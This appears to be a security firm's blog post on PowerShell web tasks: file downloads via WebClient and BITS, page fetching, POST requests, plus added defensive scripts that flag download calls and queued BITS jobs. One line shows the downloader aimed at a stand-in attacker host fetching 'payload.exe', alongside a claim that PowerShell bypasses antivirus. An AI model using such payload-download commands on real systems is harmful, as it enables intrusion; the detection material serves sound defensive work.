HOW TO USE POWERSHELL AS HANDILY AS A SHELL SCRIPT?
PowerShell is a mixture of a command line, a functional programming language, and an object-oriented programming language. PowerShell is also called the explorer's scripting language. With built-in help, command discovery, and access to much of the .NET Framework, it is possible to dig down through the layers. In this blog, we are going to discuss internet-related tasks using PowerShell.
Shell scripts give Linux admins a lot of freedom, so why shouldn't PowerShell provide the same for Windows admins? For example, if you are a consultant, one of the things you need to do regularly is connect to clients' Wi-Fi networks. This task may come up once a month, or it may be a daily task. Opening Internet Explorer, navigating to the page, typing the credentials and submitting the request takes a lot of time. There is an easier way to handle your daily routine directly with simple PowerShell scripting. Here I am going to share some sample scripts to automate your routine tasks. My job is also to bring to your notice how such options are used by potential attackers to bypass your security implementations.
Let’s get started…
CONTENTS
Downloading Files
WebClient with Proxy Authentication
Downloading with BitsTransfer
  Synchronously method
  Asynchronously method
Download Web Page Content
Search and View Any Videos
Refreshing Web Pages
HTML Encoding and Decoding
Sending POST Data via PowerShell
DOWNLOADING FILES
To automatically download files from the internet, we can use the .NET WebClient object. This script shares its internet connection settings with Internet Explorer.
# Source URL and local destination
$url = 'http://www.briskinfosec.com/sample/example.pdf'
$object = New-Object Net.WebClient
$localPath = "$home\Documents\example.pdf"
# Download the file, highlight it in Explorer, then open it
$object.DownloadFile($url, $localPath)
explorer.exe "/SELECT,$localPath"
Invoke-Item -Path $localPath
Most attackers use this script to auto-download their payloads. PowerShell also has the ability to bypass antivirus.
The attacker will insert the address of the server where the payload is placed in the URL section:
$url = 'http://www.hacker.com/payload.exe'
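
An added example, not part of the original post: from the defender's side, one way to spot these download calls is to search logged PowerShell script text for them. It goes beyond DownloadFile to the other transfer calls this post uses (DownloadString, Start-BitsTransfer, Msxml2.XMLHTTP); the function name Find-DownloadCall, its allowlist parameter, the sample records and the host downloads.example.test are assumptions made up for the illustration.

```powershell
# Added example (not from the original post). The sample records are constructed.
# On a host with script block logging enabled, build the same objects from event 4104:
#   Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     Select-Object TimeCreated, @{ N = 'ScriptBlockText'; E = { $_.Properties[2].Value } }

# Transfer calls used in this post, as regular expressions (-match is case-insensitive).
$DownloadPatterns = [ordered]@{
    'WebClient.DownloadFile'   = '\.DownloadFile\s*\('
    'WebClient.DownloadString' = '\.DownloadString\s*\('
    'Start-BitsTransfer'       = '\bStart-BitsTransfer\b'
    'Msxml2.XMLHTTP'           = '\bMsxml2\.XMLHTTP\b'
}

function Find-DownloadCall {   # hypothetical helper name
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [psobject] $Record,
        [string[]] $AllowedHost = @()   # hosts this machine is expected to fetch from
    )
    process {
        $text  = [string]$Record.ScriptBlockText
        $calls = @($DownloadPatterns.GetEnumerator() |
                   Where-Object { $text -match $_.Value } |
                   ForEach-Object { $_.Key })
        if ($calls.Count -eq 0) { return }   # no transfer call in this script block

        # Pull literal URLs out of the script text; unparsable ones count as unknown.
        $urls    = @([regex]::Matches($text, 'https?://[^\s''"]+') | ForEach-Object { $_.Value })
        $unknown = @($urls | Where-Object {
            $u = $null
            -not ([uri]::TryCreate($_, [System.UriKind]::Absolute, [ref]$u) -and $u.Host -in $AllowedHost)
        })
        [pscustomobject]@{
            TimeCreated = $Record.TimeCreated
            Calls       = $calls -join ', '
            Urls        = $urls -join ' '
            # Review when a host is off the allowlist, or when no literal URL is visible.
            NeedsReview = ($unknown.Count -gt 0 -or $urls.Count -eq 0)
        }
    }
}

$sample = @(   # constructed records, shaped like the Select-Object output above
    [pscustomobject]@{ TimeCreated = [datetime]'2024-01-10T09:15:00'
        ScriptBlockText = '(New-Object Net.WebClient).DownloadFile("http://www.briskinfosec.com/sample/example.pdf", $localPath)' }
    [pscustomobject]@{ TimeCreated = [datetime]'2024-01-10T09:17:30'
        ScriptBlockText = 'Start-BitsTransfer -Source "http://downloads.example.test/setup.exe" -Destination $target' }
    [pscustomobject]@{ TimeCreated = [datetime]'2024-01-10T09:18:00'
        ScriptBlockText = 'Get-ChildItem -Path $home\Documents' }
)
$sample | Find-DownloadCall -AllowedHost 'www.briskinfosec.com' | Format-Table -AutoSize
```

The record without a transfer call is skipped, and only the call to the host outside the allowlist is marked for review.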
WEBCLIENT WITH PROXY AUTHENTICATION
If you need to go through an internet proxy to reach the internet with the WebClient object, you can set the proxy in the script to use your default credentials.
# Returns a WebClient that authenticates to the proxy with the current user's credentials
function Get-WebClient {
    $wc = New-Object Net.WebClient
    $wc.UseDefaultCredentials = $true
    $wc.Proxy.Credentials = $wc.Credentials
    $wc
}
$url = 'http://www.briskinfosec.com/sample/example.pdf'
$object = Get-WebClient
$localPath = "$home\Documents\example.pdf"
$object.DownloadFile($url, $localPath)
explorer.exe "/SELECT,$localPath"
Invoke-Item -Path $localPath
DOWNLOADING WITH BITSTRANSFER
BITS is the technology Windows uses to download updates. It can download large files, though not as fast. If a restart interrupts the download, it resumes from where it left off once the system boots up. BITS can be used to download files synchronously (while you wait) and asynchronously (in the background).
SYNCHRONOUSLY METHOD:
$url = 'http://www.briskinfosec.com/sample/example.pdf'
$target = "$HOME\Documents\example.pdf"
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $target
explorer.exe "/SELECT,$target"
Invoke-Item -Path $target
ASYNCHRONOUSLY METHOD:
$url = 'http://powershell.com/cs/media/p/31297/download.aspx'
$target = "$HOME\Documents\PowerShell_Using_Registry.pdf"
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $target -DisplayName BriskDownload -Asynchronous
Once the transfer has finished, run this command to finalize the download:
Get-BitsTransfer -Name 'BriskDownload' | Complete-BitsTransfer
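
An added example, not part of the original post: because an asynchronous job stays in the BITS queue until it is completed, an administrator can review what is queued on a machine and where each file comes from. The function name Get-BitsJobReview, its allowlist parameter, the sample job objects and the host downloads.example.test are assumptions made up for the illustration; the property names follow the job objects that Get-BitsTransfer returns.

```powershell
# Added example (not from the original post). The sample jobs are constructed.
# On a live system, pipe real jobs in instead (needs an elevated console for -AllUsers):
#   Get-BitsTransfer -AllUsers | Get-BitsJobReview -AllowedHost 'powershell.com'

function Get-BitsJobReview {   # hypothetical helper name
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [psobject] $Job,
        [string[]] $AllowedHost = @()   # download sources this machine is expected to use
    )
    process {
        # A job can carry several files; report each source/target pair separately.
        foreach ($file in $Job.FileList) {
            $source = $null
            $known  = [uri]::TryCreate([string]$file.RemoteName, [System.UriKind]::Absolute, [ref]$source) -and
                      $source.Host -in $AllowedHost
            [pscustomobject]@{
                DisplayName = $Job.DisplayName
                Owner       = $Job.OwnerAccount
                State       = $Job.JobState      # 'Transferred' = finished, waiting for Complete-BitsTransfer
                Created     = $Job.CreationTime
                Source      = $file.RemoteName
                Target      = $file.LocalName
                NeedsReview = -not $known
            }
        }
    }
}

$sampleJobs = @(   # constructed objects with the same property names as real BITS jobs
    [pscustomobject]@{ DisplayName = 'BriskDownload'; OwnerAccount = 'LAB\alice'; JobState = 'Transferred'
        CreationTime = [datetime]'2024-01-10T09:20:00'
        FileList = @([pscustomobject]@{ RemoteName = 'http://powershell.com/cs/media/p/31297/download.aspx'
                                        LocalName  = 'C:\Users\alice\Documents\PowerShell_Using_Registry.pdf' }) }
    [pscustomobject]@{ DisplayName = 'BITS Transfer'; OwnerAccount = 'LAB\bob'; JobState = 'Transferring'
        CreationTime = [datetime]'2024-01-10T09:42:00'
        FileList = @([pscustomobject]@{ RemoteName = 'http://downloads.example.test/setup.exe'
                                        LocalName  = 'C:\Users\bob\AppData\Local\Temp\setup.exe' }) }
)
$sampleJobs | Get-BitsJobReview -AllowedHost 'powershell.com' |
    Sort-Object -Property NeedsReview -Descending | Format-List
```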
DOWNLOAD WEB PAGE CONTENT
This script fetches the content of a web page using the WebClient object.
$url = 'http://briskinfosec.com/powershell/'
$wc = New-Object System.Net.WebClient
$wc.DownloadString($url)
SEARCH AND VIEW ANY VIDEOS
PowerShell has a fantastic feature that lets you search YouTube for videos matching a keyword you supply and offers those videos to you.
In this script, we are searching for "PowerShell tutorial" on YouTube. The list opens in a grid view window, so you can use the full-text search at the top or sort columns until you find the video you want to try.
Next, click the video to select it, and then click “OK” in the lower-right corner of the grid.
PowerShell will launch your web browser and play the video. Awesome!
$keyword = "PowerShell tutorial"
Invoke-RestMethod -Uri "https://gdata.youtube.com/feeds/api/videos?v=2&q=$($keyword.Replace(' ','+'))" |
    Select-Object -Property Title, @{N='Author';E={$_.Author.Name}}, @{N='Link';E={$_.Content.src}}, @{N='Updated';E={[DateTime]$_.Updated}} |
    Sort-Object -Property Updated -Descending |
    Out-GridView -Title "Select your '$Keyword' video, then click OK to view." -PassThru |
    ForEach-Object { Start-Process $_.Link }
REFRESHING WEB PAGES
Suppose we have some web pages open in Internet Explorer and need them to show current information, such as a cricket score or share market readings. Instead of manually reloading the pages, we can use this script to do it automatically for us.
Note: it works only with Internet Explorer, and it needs to be run from the PowerShell console, not from the ISE.
So you will run Import-Module example.ps1 and then invoke the script.
function Refresh-WebPages {
    param(
        $interval = 5   # this will refresh every five seconds
    )
    "Refreshing IE Windows every $interval seconds."
    "Press any key to stop."
    $shell = New-Object -ComObject Shell.Application
    do {
        'Refreshing ALL HTML'
        # Only shell windows that hold a document with a URL are refreshed
        $shell.Windows() |
            Where-Object { $_.Document.url } |
            ForEach-Object { $_.Refresh() }
        Start-Sleep -Seconds $interval
    } until ( [System.Console]::KeyAvailable )
    # Consume the key press that ended the loop
    [System.Console]::ReadKey($true) | Out-Null
}
HTML ENCODING AND DECODING
This script encodes special characters as HTML entities and decodes them back.
Add-Type -AssemblyName System.Web   # loads System.Web.HttpUtility
[System.Web.HttpUtility]::HTMLEncode('This is a test & a good way to encode. ÄÖÜ')
[System.Web.HttpUtility]::HTMLDecode('This is a test &amp; a good way to encode. &#196;&#214;&#220;')
OUTPUT:
PS> [System.Web.HttpUtility]::HTMLEncode('This is a test & a good way to encode. ÄÖÜ')
This is a test &amp; a good way to encode. &#196;&#214;&#220;
PS> [System.Web.HttpUtility]::HTMLDecode('This is a test &amp; a good way to encode. &#196;&#214;&#220;')
This is a test & a good way to encode. ÄÖÜ
SENDING POST DATA VIA POWERSHELL
Most of the time, feedback or votes on web pages are sent back via POST requests. You can send that information through PowerShell. We need to create a simple POST request with the target URL and the appropriate parameters, then send it.
$url = "http://anyurl.com"
$parameters = "voting=true&poll_id=5" # your POST parameters
$http_request = New-Object -ComObject Msxml2.XMLHTTP
# Third argument $false makes the request synchronous
$http_request.Open('POST', $url, $false)
$http_request.SetRequestHeader("Content-type", "application/x-www-form-urlencoded")
$http_request.SetRequestHeader("Content-length", $parameters.length)
$http_request.SetRequestHeader("Connection", "close")
$http_request.Send($parameters)
# Status text of the response, e.g. OK
$http_request.StatusText
CONCLUSION
In this blog we have discussed internet-related tasks on which system admins can save time by running the scripts above. There are many more scripts available to automate the routine processes of your day.
Briskinfosec offers periodic system hardening solutions to bring down the risk level in the organization. Our constructive and customized solution will help protect the organization from serious threats against system hardening.
AUTHOR
Venkatesh C.S
Security Engineer
Briskinfosec Technology and Consulting PVT LTD
Find me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/